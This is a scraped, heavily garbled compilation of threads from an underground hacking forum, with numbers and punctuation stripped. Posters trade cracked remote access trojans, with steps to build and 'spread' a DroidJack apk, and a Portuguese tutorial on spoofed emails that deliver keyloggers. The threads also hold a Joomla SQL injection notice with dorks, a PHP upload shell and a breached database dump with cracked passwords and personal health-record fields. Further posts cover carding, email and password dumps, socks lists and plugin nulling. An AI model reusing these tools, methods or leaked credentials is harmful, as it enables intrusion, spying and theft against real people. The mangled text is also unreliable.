click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions hacking tools and programs remote administration tools xtreme rat. 
private cracked announcements some other awesome news share pages previous next new reply thread rating vote average thread modes xtreme rat. 
private cracked sana offline junior member posts threads joined jun reputation location country united states money. 
donate nice share hope work thanx hklahm offline junior member posts threads joined jul reputation location munchen country afghanistan money. 
donate thanks lot good stuff. 
hypercracker offline junior member posts threads joined jul reputation location the system country united kingdom money donate star bycoder wrote attach config attach here you this awesome rat dowloand link xracerx offline junior member posts threads joined jun reputation location singapore country singapore money. 
donate this post was last modified xracerx. 
thanks for the share how change the language only see one options cyberlord offline junior member posts threads joined jul reputation location chennai country india money. 
hope works robbie offline junior member posts threads joined jun reputation location france country france money. 
donate thanks purchased rat and never got set before time expired will look forward this offline junior member posts threads joined jul reputation location nigeria country nigeria money. 
donate bycoder wrote attach config attach here you this awesome rat dowloand link eliabaitel offline junior member posts threads joined jul reputation location california country united states money donate bycoder wrote attach config attach here you this awesome rat dowloand link goraiasish offline junior member posts threads joined jul reputation location india country india money. 
donate thanks for share this with jameswang offline member posts threads joined aug reputation location tokyo country chile money. 
donate this post was last modified jameswang. 
good nice share man very good nice thanks enter keywords search thread pages previous next new reply quick reply message type your reply this message here. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions hacking tools and programs remote administration tools leak droidjack. 
android rat remote administrator tool cracked announcements some other awesome news share pages previous. 
jump page new reply thread rating vote average thread modes leak droidjack. 
android rat remote administrator tool cracked xvyctim online the vyctim posts threads joined jan reputation location warning level money. 
android rat remote administrator tool cracked announcements pretty cool huh share pages previous. 
android rat remote administrator tool cracked mlbnkm offline junior member posts threads joined dec reputation location delhi country india money. 
donate let check most them gives token error thanks advance astrostatic offline junior member posts threads joined dec reputation location country united states money. 
donate thanks man this awesome. 
piramide offline junior member posts threads joined dec reputation location country mexico money. 
donate will tell you how got working thank you hackfucker offline junior member posts threads joined dec reputation location home country algeria money. 
donate great pal thank you very much weedov offline junior member posts threads joined jan reputation location localhost country romania money donate cyber warrior wrote image iroab fsu. 
png this brand new android rat remote administrator tool for hacking android smart phones. 
it's working you can see this video. 
register dynamic dns from dnsdynamic. 
choose port example forward the chosen port and default need port forward ports. 
generate the apk with the chosen port and dynamic dns and other details. 
spread your apk file and enoy dirol rolexdeepweb offline junior member posts threads joined dec reputation location kazakistan country kazakhstan money. 
donate dinanshsepolia offline junior member posts threads joined jan reputation location jammu country india money. 
timkatimka offline junior member posts threads joined jul reputation location asia country india money. 
donate lkzdzlkdv bvz ldmb zlmb'mzbm lzmb lzsm lsmv lsmv msd lbmsd mrchickengamer offline junior member skype posts threads joined jan reputation location united states money. 
donate might want check this out thanks interweb offline junior member posts threads joined aug reputation location country united states money. 
donate hours ago now just need rat for ios enter keywords search thread pages previous. 
jump page new reply quick reply message type your reply this message here. 
signature disable smilies post reply preview post possibly related threads. 
thread author replies views last post dendroid android malware full source code codefire hours ago last post interweb xtreme rat. 
private cracked bycoder hours ago last post interweb hot android remote administration tool ihatehissite last post ihatehissite smile tutorial anyone wanna learn how make android rat without downloading virus securecrack last post zeushacker leak android hacking tool droidjack. 
extended tanmayt last post bikashguragai selling omnirat remote administrate all android devices omnirat last post kim woo hyun dendroid rat android http rat hydra last post drag art android rats good bad toobuku last post toobuku soon going post all rat tool tut clean ver ezekial christ last post codefire view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
join the forum now. 
feel free join our community. 
links portal awards account upgrade advertisement stats links staff disclaimer dmca best vpn advertisement stats offensive community buy vip account access vip forum. 
net powered mybb mybb group design myskins studio contact offensive community lite archive mode rss syndication the vyctim was here dirol indocyber network dirol jmanunited offline junior member posts threads joined jan reputation location houston country united states money. 
donate minutes ago thank for sharing bro will see works enter keywords search thread pages previous. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions advanced hacking tutorials read anyone's facebook message without hacking them still working forum merge with indianhacker. 
net login with old details share pages. 
next jump page new reply thread rating vote average thread modes read anyone's facebook message without hacking them still working offline posts threads joined jan reputation money. 
donate this post was last modified. 
table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort content. 
gebjz table cheers mike briphil offline junior member posts threads joined mar reputation money donate let's see how works out joyjeus offline junior member posts threads joined mar reputation money donate let try. 
wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort hidden content cannot quoted. 
cheers mike vinhacks offline junior member posts threads joined jan reputation money donate let's see how works nic offline junior member posts threads joined mar reputation money donate vinhacks wrote let's see how works let see kunal choudhary offline junior member posts threads joined feb reputation money donate thanks dude tagz offline junior member posts threads joined mar reputation money donate wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
cheers mike lets see keving offline junior member posts threads joined mar reputation money donate let's see how works out harshgoyal offline junior member posts threads joined mar reputation money donate. 
offline junior member posts threads joined mar reputation money donate enter keywords search thread pages. 
next jump page new reply quick reply message type your reply this message here. 
thread author replies views last post must have hacking tut. 
hacker hours ago last post rkbot hacking any ebay account just minute codefire last post zetabyte spider hack almost everyone. 
every facebook and email via facebook hack sruthy last post pootr wireless hacking cracking wep wpa key via wifite tutorial neo jaguar codefire last post xvyctim how ethical password hacking and protecting ihatehissite last post ihatehissite hacking facebook pages codefire last post freddie hacking into computer with pictures codefire last post prasan collection hacking penetration testing and security cheatsheets codefire last post massesse hot tutorial hacking lol chat hack virg last post bladster wireless hacking cracking wep key codefire last post anana view printable version send this thread friend unsubscribe from this thread forum jump users browsing this thread cyberxtrem xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
net powered mybb mybb group design myskins studio contact offensive community lite archive mode rss syndication post reply preview post possibly related threads. 
thread author replies views last post smile tutorial anyone wanna learn how make android rat without downloading virus securecrack last post xvyctim dendroid android malware full source code codefire last post interweb xtreme rat. 
private cracked bycoder last post interweb hot android remote administration tool ihatehissite last post ihatehissite leak android hacking tool droidjack. 
extended tanmayt last post bikashguragai selling omnirat remote administrate all android devices omnirat last post kim woo hyun dendroid rat android http rat hydra last post drag art android rats good bad toobuku last post toobuku soon going post all rat tool tut clean ver ezekial christ last post codefire view printable version send this thread friend unsubscribe from this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
thread author replies views last post leak droidjack. 
android rat remote administrator tool cracked cyber warrior minute ago last post xvyctim xtreme rat source code amionxp last post ihatehissite leak android hacking tool droidjack. 
extended tanmayt last post bikashguragai view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
thread author replies views last post super fresh proxies montana last post xvyctim unblocked glype proxies access blocked sites easily privateloader last post sanji proxies bond benz last post bond benz leak proxies socks updated sunrise last post sunrise selling proxies and socks sunrise last post sunrise leak clean socks and proxies updated sunrise last post sunrise anonymous elite http proxies kilaz last post kilaz large proxy list jan pratham last post sids glype proxies with hotlinking disabled privateloader last post privateloader fresh proxies vps. 
cracker last post vps. 
cracker view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
net powered mybb mybb group design myskins studio contact offensive community lite archive mode rss syndication. 
thank you bro for you. 
thank you for nice share mate. 
need check before confirming. 
this honestly one the best methods out there and tested. 
works without further ado ill show payment proof first. 
png this happens every week now because got lazy but you can earn some sweet money with this pretty simple method ill explain below how make money using referral programs use free play games usually play free play games online and most them have some sort premium currency. 
the longer you play the game more you want the premium currency level sooner get better gear. 
are going use that our advantage. 
since these games already make the player hungry for they online and search for methods get for free. 
they start looking how get free insert currency's name here. 
some youtube videos will pop with lots virus and scam. 
same thing for blogs. 
usually people will click the first link and try they will give. 
what you need get there get site which pays you lot different giftcards and gives good referral bonus. 
remember not use website that focused just making money. 
you need one that stimulates getting the currency early. 
site that worked for gifthulk google. 
make use exchange websites look for websites that exchange youtube likes views. 
example addmefast like like etc. 
once you find website that works many more will found. 
note script for addmefast bh's forum. 
upload youtube video after that open your favorite video software. 
lazy use windows moviemaker. 
now make few shots how the site looks and make some cool images paint why they should sign get that early where you want head too. 
finish the video and don't worry about quality. 
quality doesn't matter all long the video longer than seconds. 
three four motivational sentences. 
upload that stuff alternative youtube account and make sure you get some good keywords there. 
com make post with only your referral url and make some more posts where you randomly copy and paste stuff from random forums. 
get the link from your blog and place the description your youtube video. 
you now have done half the work back exchange sites distribute some those points over your video. 
get around likes and views. 
don't over you'll get your channel banned. 
repeat these steps lot. 
keep making videos keep boosting them. 
spread them multiple accounts and upload lots videos. 
never put the referral the beermoneysite that will get you banned. 
always use blogger wordpress and switch that one too once while. 
now what people randomly click through videos and will end finding yours. 
wont click the link but the last one will. 
with enough videos you will get hundreds hits the beermoney site you chose and the best part that these people don't know about referrals other beermoney sites etc they will continue the fill out surveys get their free premium currency. 
thanks for reading and have fun follow instructions the point and you too will make money just keep pushing and don't give. 
reactions wrote reactions from people who have used. 
working not pls answer. 
med bad boy wrote hello code code exploit database separated exploit type local remote dos etc. 
com support mail submit day. 
com i'm caddy member from inj team exploit title joomla all. 
error based sql injection vulnerability author caddy facebook page. 
army mail islam babia hotmail. 
com category webapps script home. 
com dork inurl option com user security risk critical tested back track kde french this was written for educational purpose only. 
use your own risk. 
author will not responsible for any damage caused user assumes all responsibility intended for authorized web application pentesting only description the affected component com user all joomla. 
you could know the version openning the source code the target and searching for joomla you'll see the version exploit. 
php option com user view reset itemid sql injection. 
php option com user view reset itemid sql injection replacing number character priv youtube link just people who has the link could view just another bunch daysjust another bunch daysjust another bunch daysjust another bunch daysjust another bunch days code exploit title aps arastar sql vulnerability google dork inurl about. 
com admin aps index. 
spy yahoo dot com greet. 
black ger all libyan hacker exploit. 
code exploit admin upgrade index. 
php app upgrade section index login dork intext community forum software. 
board fix turn off display errors php. 
ini may just kill myself because this post. 
this forum need experienced social engineer and hacker such lolol. 
thanks for awesome job. 
new programming and have taught myself vhdl and verilog for starters. 
question does anyone know any tool software could use which inputs vhdl verilog source code file and outputs the codes underlying algorithm equation form any help will much appreciated. 
muchas gracias los scrits. 
rafaelcarioca wrote using facebook accounts. 
txt password and start cracker download url. 
lets see more your job. 
maybe gonna good one hoe its legit. 
sruthy wrote tutorial corte ningu facebook mail. 
este tutorial como uma maneira tutorial espalhando basicamente. 
mas mais preciso poderoso. 
meninas principalmente ter hackeado com este todo porque eles deixe enganar facilmente por poser outra merda ent essa coisa pode faz. 
requisitos servidor totalmente fud ser servidor fud parte mais importante hack paci ncia isso tudo. 
existem basicamente milhares tutoriais sobre keylogger rato ladr crypting. 
assim que ler fazer seu servidor totalmente fud. 
agora exatamente como que digo para. 
php deixar que aba aberta agora login seu facebook copiar nome pessoa nome usu rio que deseja cortar como este. 
ent basicamente nome nome usu rio. 
meu exemplo aleat rio nome usu rio. 
link mostra url como. 
php ent voc pode usar esse todo com eles. 
como voc amigo pessoa que voc deve saber quem ele seu sua melhor amigo apenas amigo ximo. 
ent basicamente obter seu mail anexado seu facebook como isso pode ser dif cil voc tem essa pessoa como seu amigo qualquer maneira voc pode pedir sua seu mail voc conhec. 
agora abrir aba spoofer cole informa seguinte forma spoofed email que roubado informa contato something anymail. 
com responder mail mesmos como mail falsificado tulo mensagem qualquer outra coisa corpo mensagem confira meu novo fotos enviados aqui link seu key logger rato que quer que ele ela vai receber essa mensagem falsificado pessoa como ele ela sua amiga ela vai download execute escravo vai levar algum tempo para ler mensagem download arquivo execut. 
por isso que disse paci ncia uma exig ncia. 
pro dica voc estiver usando mensagem partir exemplo ent sugiro que voc baixe pouco pessoa falsificado amigo escravo fotos uso icon changer para mudar cone servidor cone jpeg colocar tudo que fotos seu servidor para arquivo. 
rar envi para site hospedagem. 
lol ningu extens voc fizer essa coisa. 
usar spoofer extens tripula rato para mudar extens jpeg alterar cone servidor para jpeg tamb. 
thank you very much bro. 
want see the link download. 
and that rar contains only images cant upload and create nice tut. 
all was wondering anyone here any good getting into websites cash waiting for decent hacker. 
wrote madscan exploit scanner for joomla and wordpress. 
how use just give target after that select what type site that joomla wprdpress then click start button. 
after finish the scan will give you popup about result. 
now you have click save report. 
now copy the exploitable link. 
and search google like the image. 
now you got the exploit. 
play with your hacking skill now wink you need. 
for run this tool download link click virus scan report click genio muy bueno very good. 
this post here may well contribute something useful javascript keygen for malwarebytes anti malware which works right browser. 
com view ctj gqp. 
html note this program still has some glitches and bugs that will fixed later the key generated will not work unless the digits long working this problem screenshot download links. 
thank you much friend. 
thanks mate this should work. 
will try but dont believe works. 
kla 'ben robot deg me' bas sonra 'getlink' yaz bas nca lcak link. 
packet capturing session hijacking man the middle attack ebook cool. 
thanks buddy need similar tool. 
lmfao how can this any use don't install it's trojan. 
payment instantly perfectmoney bitcoin wmtransfer btc please click buy socks update tools client dichvusocks. 
php link check socks. 
net united states blacklist checked. 
net canada blacklist checked. 
net united states blacklist yes checked. 
com united states blacklist checked. 
net mexico blacklist checked. 
virginia united states blacklist yes checked. 
unknow unknow united states blacklist checked. 
goo sammohung wrote thanks for sharing 'pro. 
hakgod' pid dateline dumps carding tutorial beginning before you out there and start instoring you will need the following items. 
passwords sent from iphone using tapatalk. 
thanks lot for sharing. 
concern about this could you show the link download please. 
let see how this work. 
rafiqctg wrote friends enjoy dont change password url thxs rafiqctg wrote friends enjoy dont change password url nice thx rafiqctg wrote friends enjoy dont change password url. 
friends enjoy dont change password. 
have absolutely access their phone they live city far away that means there isn't much can gain access their whatsapp they blocked out can't send spyware. 
the link has been removed. 
txt password and start cracker download url wow. 
unknow unknow united kingdom blacklist yes checked. 
com japan blacklist checked. 
looks interesting might try. 
will help soo mutch. 
thank you for help let see what. 
making enjoy thnks friends. 
nice tools vroh indonesia. 
how use them just executed the cpanel attacker. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community cracking zone cracking accounts email password announcements pretty cool huh share pages previous new reply thread rating thread modes email password toodast offline junior member posts threads joined jul reputation location country united states money. 
how did you thanks poptarts poptarts offline junior member posts threads joined jul reputation location florida country united states money. 
donate does work all email servers jenna offline junior member posts threads joined apr reputation money. 
donate how did you get this pewpewha offline junior member posts threads joined aug reputation location newyork country afghanistan money. 
donate this post was last modified pewpewha. 
dsvafdsgfdgh fdghgfjhhdgfh fgdjh chuksjack yahoo. 
com offline junior member posts threads joined jul reputation location nigeria country nigeria money. 
donate nice job how yahoo hacks cvbnm offline junior member posts threads joined nov reputation location riyadh country saudi arabia money. 
how did you hacked these vyris online junior member posts threads joined jan reputation location united states money. 
donate hour ago this post was last modified hour ago vyris. 
nice work can you inbox wanna learn how this enter keywords search thread pages previous new reply quick reply message type your reply this message here. 
thread author replies views last post mix account password rafiqctg last post corbis how get users email and using facebook login with graph api morpheous last post sanderson huge email password dump biokinetix last post kkpuri gmail. 
com username password dump biokinetix last post dannyboy facebook email's big list free dato japharidze last post dhtrz buy per week looking for email hackers full time part time last post you can hack this email otavioaugusto last post otavioaugusto view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
net powered mybb mybb group design myskins studio contact offensive community lite archive mode rss syndication are you using google dorks. 
working who has tested. 
com united states blacklist yes checked. 
rio janeiro unknow dae. 
net taiwan blacklist yes checked. 
russian federation blacklist checked. 
italy blacklist yes checked. 
replying coz wanna read about this. 
thnk you for posting. 
waiting for the file for long time. 
everyone i'm looking for any book guide text for ddos reflection attacks. 
have basic knowledge about and python. 
also have read the book the web application hacker's handbook discovering exploiting security flaws. 
please recommend which books should read firstly then secondly and. 
lets see this works. 
php article database genad table user entries tel email username password supat supat jidjard hotmail. 
com jidjard jidjard nipon. 
nipon nipon webmaster obec. 
krupeera peera boonyapattaro hotmail. 
com saisanom saisanom provis. 
info cracked password for user 'datacen' info cracked password for user 'sport' info cracked password 'dd for user 'str' info cracked password 'str for user 'mu info starting dictionary based cracking mysql old passwd info cracked password 'woot' for user 'leo. 
wcad filename webboard database opddatacenter table user entries user pass name admin admin administrator test sang pcu saraburi tedsaban amd amd amd amd amd amd amd test amd amd amd maung maung. 
root uid login openid url email enddate user ewt pass startdate short name login ldap site intra ewt status websitename login ldap ewt permission null. 
com dbweb null raburi web null sro null. 
com ewtadmin ewt sara. 
cdcssk password hash password hash dhf password hash leo password hash password hash root password hash effe ssko password hash dcde database tor table tor user entries org name fullname pwd login user login bom bom bom nonkoon nonkoon bozo. 
prangku prangku rssk rangsan. 
added hash algo status length password effe mysql cracked delete and cancel this task mysql cracked delete and cancel this task mysql cracked delete and cancel this task. 
datacentpcu datacentpass die mysql error mysql select jepidem con conr mysql connect localhost cdcssk die mysql error mysql select conr sql mysql query select from main limit con while mysql fetch array sql 'pe 'pe disease 'disease' name 'name' 'hn' nmepat 'nmepat' sex 'sex' agey 'year' agem 'month' aged 'day' marietal 'marietal' race 'race' occupat 'occupat' moo substr 'addrcode' amphoe substr 'addrcode' tumbon substr 'addrcode' address 'address' addrcode 'addrcode' province 'province' metropol 'metropol' hospital 'hospital' type 'type' result 'result' hserv 'hserv' class 'class' school 'school' datesick 'datesick' datedefine 'datedefine' datedeath 'datedeath' daterecord 'daterecord' datereach 'datereach' intime 'intime' organism 'organism' complica 'complica' source mysql query insert into epe main disease name nmepat sex agey agem aged marietal race occupat moo address province amphoe tumbon addrcode metropol hospital type result hserv class school datesick datedefine datedeath daterecord datereach intime organism complica source values disease name nmepat sex agey agem aged marietal race occupat moo address province amphoe tumbon addrcode metropol hospital type result hserv class school datesick datedefine datedeath daterecord datereach intime organism complica source die mysql error echo success epi main sqlr mysql query select from epe limit conr while rsr mysql fetch array sqlr rsr rsr rsr 'pe rsr 'pe disease rsr 'disease' disease rsr 'disease name rsr 'name' rsr 'hn' nmepat rsr 'nmepat' sex rsr 'sex' agey rsr 'year' agem rsr 'month' aged rsr 'day' marietal rsr 'marietal' race rsr 'race' race rsr 'race occupat rsr 'occupat' house rsr 'house' moo substr rsr 'addrcode' amphoe substr rsr 'addrcode' tumbon substr rsr 'addrcode' address rsr 'address' addrcode rsr 'addrcode' province rsr 'province' metropol rsr 'metropol' hospital rsr 'hospital' type rsr 'type' result rsr 'result' hserv rsr 'hserv' class rsr 'class' school rsr 'school' datesick rsr 'datesick' datedefine rsr 'datedefine' datedeath rsr 'datedeath' daterecord rsr 'daterecord' datereach rsr 'datereach' intime rsr 'intime' organism rsr 'organism' organism rsr 'organism complica rsr 'complica' idcard rsr 'idcard' icd rsr 'icd officeid rsr 'officeid' mysql query insert into epe main disease disease name nmepat sex agey agem aged marietal race race occupat house moo address province amphoe tumbon addrcode metropol hospital type result hserv class school datesick datedefine datedeath daterecord datereach intime organism organism complica idcard icd officeid source values. 
disease disease name nmepat sex agey agem aged marietal race race occupat house moo address province amphoe tumbon addrcode metropol hospital type result hserv class school datesick datedefine datedeath daterecord datereach intime organism organism complica icd officeid echo success mysql free result show bash. 
connections bash connections such file directory bash. 
htm type mysql hostname tor localhost database tor tor username tor root password tor leo leo tor mysql pconnect hostname tor username tor password tor trigger error mysql error user error mysql query set names tis upload. 
php echo post upl' upload copy files 'file' 'tmp name' files 'file' 'name' echo 'upload success' else echo 'upload failed'. 
htm type mysql hostname death localhost database death provisdb username death root password death death mysql pconnect hostname death username death password death trigger error mysql error user error mysql query set names utf host user password select priv insert priv update priv delete priv create priv drop priv reload priv shutdown priv process priv file priv grant priv references priv index priv alter priv show priv super priv create tmp table priv lock tables priv execute priv repl slave priv repl client priv create view priv show view priv create routine priv alter routine priv create user priv event priv trigger priv create tablespace priv ssl type ssl cipher issuer subject max questions max updates max connections max user connections plugin authentication string localhost root dda null waravoot desktop root null. 
root dda null localhost debian sys maint fda null himpro bff ebee fafdbcef null neo null datacentuser dda null prasitnhso null leo ebcb ecf fdff null localhost leo ebcb ecf fdff null jang null pdn dda null datacentpass feffd cbfa null localhost datacentpass feffd cbfa null datacentpcu feffd cbfa null jojo cbe null localhost webservice feffd cbfa null arthit cbe cca null dsdata null localhost datacentpcu feffd cbfa null eak bff ebee fafdbcef null himpro dcfaedeb null neowara null kpidb dda null localhost kpidb dda null sisaket ccd eedd null eaksatid null bdc dda null sanan dbc null mister fbe cfbf null ssk dafbacadf bdb null sdcoffline null rows set. 
hello friends possible hack own snapchat account how thank you friends. 
selling debug rat most router does not allow port forward may there are restricted firewall that case cant use other rat like darkcommet something but here the sollution use php rat here have just upload php file paid free webhosting site and coonect this with debug rat client features keylogger any browser password recovery filemanager upload download file execution visit page bitcoin miner screenshot proccess viewer startup manager services manager add and edit registry key webcam view software manager system info. 
microphone remote chat funbox clipboard network manager download manger kill proccess server run admin privilage victime tutorial hide. 
wackg hide need this send mail email hide ddebug gmail. 
painkiller wrote tool pentest exploiter. 
description dedicated exploiter advanced wevdav vulnerable scanner with many and unique features. 
automatic tool which can automate the process hacking dedicated servers. 
consists four parts the grabber the webdav finder the vulnerable scanner the auto sheller you are also able use these tools with your input. 
ideal for beginners who want get their first dedicated server well for experts who want increase their quantity dedicated servers. 
main features automatic grabber grab from any site range generator random generator nonstop option grab from file extremely fast and accurate ways getting the fully customizable auto page changer limit for memory management totally multithreaded automatic webdav dir finder gets the grabbed and checks webdav dir exists split the into working and non working timeout option totally multithreaded vulnerable scanner checks with webdav dir vulnerable username and pass can modified shell uploader upload user defined php file customizable letter for temporary connection extra features secure hwid login system automatic update system export file option remote desktop checker autopilot parallelism code structure scan report painkiller wrote tool pentest exploiter. 
main features automatic grabber grab from any site range generator random generator nonstop option grab from file extremely fast and accurate ways getting the fully customizable auto page changer limit for memory management totally multithreaded automatic webdav dir finder gets the grabbed and checks webdav dir exists split the into working and non working timeout option totally multithreaded vulnerable scanner checks with webdav dir vulnerable username and pass can modified shell uploader upload user defined php file customizable letter for temporary connection extra features secure hwid login system automatic update system export file option remote desktop checker autopilot parallelism code structure scan report. 
looking for who get very good trojan undetectable antivirus and enters victims computer steal informations get back you have very good trojan horse that can get into victims computer. 
get password and all other things going the computer. 
that's what you need spy facebook conversations any android phone. 
com spy facebook android. 
thanks you will try. 
like see more thanks. 
net france blacklist checked. 
kemerovo russian federation blacklist yes checked. 
com sweden blacklist checked. 
dolnoslaskie poland blacklist yes checked. 
will try out too. 
ussef heshamnice wrote rafiqctg wrote friends enjoy dont change password url. 
have whm and they are cancelling cpanel license cause they didn't like creating lot tickets want null whm and cpanel that when they cancel can keep using like normal. 
yeah will pay you good amount you can help. 
i'm full server admin it's dedicated server. 
the owner and have full ssh access including root ssh access and root ftp access well. 
great tool will like give try. 
first and important info plugin purchaced friend and all files are clean. 
only info nulled inserted into code. 
lets start info sales page yoast home page plugin info change log page yoast whats new download info download link. 
cslist api file nulled. 
zip crc cde adef efe sha bfe users that have installed previous version just delete the old files the plugin and unzip the new one and all done. 
size color important how activate the plugin users already have installed open your phpmyadmin your database name table prefix options find the row yoast seo premium license new installation wordpress seo premium license installed before generally the and table values show rows option view this value the end table values click modify and insert key status valid expiry date the option value column click execute and enjoy the plugin without banners asking for licence. 
important how activate the plugin users with first install when install the plugin for the first time never installed before and plugin ask you insert licence key just enter number your choice just numbers after you inserted junk number follow the steps how activate the plugin users already have installed from enjoy the plugin and have fun virus total scan nov. 
you have any question need help activate the plugin feel free. 
today first day this forum. 
will share more stuff like this future. 
till then enjoy this plugin. 
hampshire cpc farn cust. 
net united kingdom blacklist checked. 
california united states blacklist checked. 
mures romania blacklist checked. 
north east unknow botswana blacklist yes checked. 
indiana united states blacklist yes checked. 
great sent from iphone using tapatalk. 
thanks hope this still works. 
very cool sent from iphone using tapatalk replied but can't access the the hidden content. 
sent from iphone using tapatalk. 
khuzestan unknow iran islamic republic blacklist yes checked. 
unknow unknow singapore blacklist yes checked. 
newcastle upon tyne cpc newc cust. 
net united kingdom blacklist yes checked. 
painkiller wrote registration code code personal code key utsr vstq. 
his btc miner coded myself fast and very reliable does not use lot ram preview tool. 
com cgi ibcy virus scan. 
beb false positive enjoy. 
thanks you very much. 
wonder it's really works remember something similar from years ago. 
inkbird wrote everytime run the program get fault message email cracker has stopped working problem caused the program stop working correctly. 
using win bit any ideas same problem. 
any fix for win bit. 
hacker dear webcards members are glad inform you that great updates has been added and prices has been reduced fresh rdp usa and europe rdp admin usa strong inbox smtp direct inbox mailer direct inbox webmail rdp with local host inbox fresh shells skype accounts fresh cpanels fresh email leads fresh email and password all those and more only our shop. 
biz all payments are automatic instant perfect money bitcoin webmoney. 
rar password vipunderground download url cool. 
will try and test for myself. 
cprivateloader wrote txtprofile the archive leak name. 
have been saving information about email accounts from some time. 
this goes from all type services. 
take look the archive and you want more. 
net zgzgfzrx bfbfgff nfbf. 
florida united states blacklist yes checked. 
washington united states blacklist checked. 
florida united states blacklist checked. 
net sweden blacklist yes checked. 
net canada blacklist yes checked. 
the legendary rcs system cracked lifetime license best available hacking system remote control system the most powerful hacking system the field. 
galileo remote control system able break encryption and allow law enforcement agencies monitor encrypted files and emails skype and other voice over chat communication according the reporters without borders advisory rcs. 
cracking video buy the crack for buy using bitcoin. 
lets see content can see this worth. 
blazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like can also enjoy. 
testing see still works. 
edit skype fixed this. 
you all guys are awesome like. 
unknow unknow blacklist yes checked. 
north carolina united states blacklist checked. 
pennsylvania united states blacklist checked. 
plz share another link. 
let check this out hope its different from the others. 
com premium porn account october login link code. 
com membersarea login details code username candybar password ruby. 
luckmangamer wrote free download portable version havij. 
about havij automated sql injection tool that helps penetration testers find and exploit sql injection web page. 
can take advantage vulnerable web application. 
using this software user can perform back end database fingerprint retrieve dbms users and password hashes dump tables and columns fetching data from the database running sql statements and even accessing the underlying file system and executing commands the operating system. 
the power havij that makes different from similar tools its injection methods. 
the success rate more than injectiong vulnerable targets using havij. 
the user friendly gui graphical user interface havij and automated settings and detections makes easy use for everyone even amateur users. 
what's new multithreading oracle blind injection method. 
automatic all parameter scan added. 
new blind injection method more char. 
retry for blind injection. 
new method for tables columns extraction mssql blind. 
waf bypass method for mysql blind. 
getting tables and columns even when can not get current database. 
bugfix url encode bug fixed. 
bugfix trying time based methods when mssql error based and union based fail. 
bugfix clicking get columns whould delete all tables. 
bugfix reseting time based method delay when applying settings. 
bugfix utf and unicode encoding hello bros really love your work. 
tatarstan russian federation blacklist checked. 
thank for sharing bro. 
you are really gem thank you allah bless you. 
hope this works dis tym. 
hey guys i'm doing study about vulnerability rewrad programs and how identify experts involved these programs. 
you are involved one many those programs would great you may answer few questions have survey. 
forms mbcvpiokvb you'll helping greatly. 
thanks advance for your time. 
completed access server hosting websites. 
please let see the link. 
got bored made this spambot features fast spamming hotkeys work some games have test more comming features custem spam speed custem hotkeys bugs code. 
com file ebcb analysis code. 
org scanresult downlooad code. 
tut sent from using tapatalk. 
madison unknown united states checked socks. 
colorado springs united states checked socks. 
monett united states checked socks. 
unknown unknown unknown united states checked socks. 
pittsburgh united states checked socks. 
wrightstown united states checked socks. 
maricopa unknown united states checked socks. 
washington united states checked socks. 
fort smith united states checked socks. 
unknown unknown unknown unknown checked socks. 
greensburg united states checked socks. 
goleta united states checked socks. 
york united states checked socks. 
miami unknown united states checked socks. 
alamogordo united states checked socks. 
houston unknown united states checked socks. 
mount laurel united states checked socks. 
colorado united states blacklist checked. 
rio grande norte unknow. 
brazil blacklist yes checked. 
net japan blacklist yes checked. 
elite proxy grabber tester speed virusscan report code. 
org scanresult fda download code. 
wow you put lot effort into this nice. 
lets see what bitcoin stealer and its working another time waster spam edit download link mirror please. 
guys college has web application. 
which highly vulnerable scanned acunetix vulnerable jquery xss how can one exploit such can someone help out give shot yourself. 
everyone asked from outside the internet can attack them lan. 
lab network network dropouts not thank. 
lulz after posting this program saw there nothing extra for vip members except fud crypter and this also not available yet. 
lulz well have downloaded the new version. 
will try crack the new version soon possible and post found something extra functionality the program. 
unknow unknow india blacklist yes checked. 
north dakota united states blacklist yes checked. 
hello mates found this method contacting this guy this forum thought might share this. 
checkout here thanks and just let this bot your side bots make much usd. 
new york ool cff. 
magallanes antartica chilena unknow chile blacklist yes checked. 
net venezuela blacklist checked. 
poland blacklist yes checked. 
com files might virus because antivirus mendetect ddos tool has technically viruses flooding requests. 
bugfix utf and unicode encoding. 
will nice can get hands. 
checking now thanks man checking now thanks. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp luckmangamer wrote about computer and network security complex subject and ever moving target. 
hope can learn something here ifake not opening the website down. 
deerfield beach united states checked socks. 
valrico united states checked socks. 
decatur unknown united states checked socks. 
lancaster united states checked socks. 
medford unknown united states checked socks. 
phoenix united states checked socks. 
harrisonville united states checked socks. 
miami united states checked socks. 
orlando unknown united states checked socks. 
fort myers unknown united states checked socks. 
